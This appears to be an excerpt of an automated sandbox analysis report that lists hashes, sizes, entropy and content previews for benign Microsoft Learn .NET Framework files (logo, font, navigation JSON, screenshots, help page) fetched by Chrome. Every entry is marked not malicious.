                                                                                                                                                                                        SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                        SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                        Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):19696
                                                                                                                                                                                        Entropy (8bit):7.9898910353479335
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                        MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                        SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                        SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                        SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                        Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):33148
                                                                                                                                                                                        Entropy (8bit):4.917595394577667
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                        MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                        SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                        SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                        SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                        Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):35005
                                                                                                                                                                                        Entropy (8bit):7.980061050467981
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                        MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                        SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                        SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                        SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):13842
                                                                                                                                                                                        Entropy (8bit):7.802399161550213
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                        MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                        SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                        SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                        SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                                        Entropy (8bit):4.8007377074457604
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                        MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                        SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                        SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                        SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):47062
                                                                                                                                                                                        Entropy (8bit):5.016115705165622
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                        MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                        SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                        SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                        SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                        Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):3130
                                                                                                                                                                                        Entropy (8bit):4.790069981348324
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                        MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                        SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                        SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                        SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                        Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):18367
                                                                                                                                                                                        Entropy (8bit):7.7772261735974215
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                        MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                        SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                        SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                        SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):13339
                                                                                                                                                                                        Entropy (8bit):7.683569563478597
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                        MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                        SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                        SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                        SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):18367
                                                                                                                                                                                        Entropy (8bit):7.7772261735974215
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                        MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                        SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                        SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                        SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1154
                                                                                                                                                                                        Entropy (8bit):4.59126408969148
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                        MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                        SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                        SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                        SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):3130
                                                                                                                                                                                        Entropy (8bit):4.790069981348324
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                        MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                        SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                        SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                        SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):15427
                                                                                                                                                                                        Entropy (8bit):7.784472070227724
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                        MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                        SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                        SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                        SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                        Malicious:false
